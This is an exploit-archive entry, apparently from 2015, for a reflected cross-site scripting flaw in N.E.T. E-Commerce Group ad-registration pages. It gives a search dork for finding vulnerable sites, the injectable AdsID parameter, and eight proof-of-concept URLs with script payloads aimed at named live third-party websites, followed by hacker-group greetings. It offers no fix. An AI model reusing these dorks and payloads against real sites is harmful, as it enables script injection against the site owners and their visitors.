N.E.T. E-Commerce Group Cross Site Scripting Vulnerability

2015.02.25

Credit: Iranian Exploit DataBase

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: \"Designed And developed By N.E.T E-Commerce group\"

#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# N.E.T. E-Commerce Group Cross Site Scripting Vulnerability

# Vendor site : http://www.iranmarketcenter.org/

# Dork : "Designed And developed By N.E.T E-Commerce group"

# Author : IeDb

# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir

# Vulnerability attack information site : http://vuln.iedb.ir/

# Fb Page : https://www.facebook.com/iedb.ir

#####################################

Bug :

http://www.site.com/ads_register.php?AdsID=[xss]

Dem0 :

http://www.1xy.ir/ads_register.php?AdsID=1"><script>alert(/Amir/)</script>
http://iranmc.tl1.ir/ads_register.php?AdsID=1"><script>alert(/Amir/)</script>
http://www.bziran.com/ads_register.php?AdsID=1"><script>alert(/Amir/)</script>
http://rapidkav.com/ads_register.php?AdsID=1"><script>alert(/Amir/)</script>
http://www.roozaneh.ir/ads_register.php?AdsID=1"><script>alert(/Amir/)</script>
http://sabtekharid.ir/ads_register.php?AdsID=1"><script>alert(/Amir/)</script>
http://agahi-niaz.ir/ads_register.php?AdsID=1"><script>alert(/Amir/)</script>
http://www.bziran.com/ads_register.php?AdsID=1"><script>alert(/Amir/)</script>

#####################################

# Greats : Bl4ck M4n - ErfanMs - 4ntr4x - N20 - b3hz4d4 - dr.koderz - Khashayar - E1.Coders 

# Behnam Vanda - l4tr0d3ctism - H-SK33PY - sole sad - 0Day - Dr_Evil - z3r0 - 0x0ptim0us 

# Security - ARTA - ARYABOD - Mr.Time - C0dex - Det3cT0r - yashar shahinzadeh - Khashayar 

#  tootro20 - AmirMasoud And All Members In IeDb.Ir/acc

#####################################

#  Archive Exploit = http://www.iedb.ir/exploits-2747.html

#####################################

References:

http://www.iedb.ir/exploits-2747.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

N.E.T. E-Commerce Group Cross Site Scripting Vulnerability

Dork: \"Designed And developed By N.E.T E-Commerce group\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.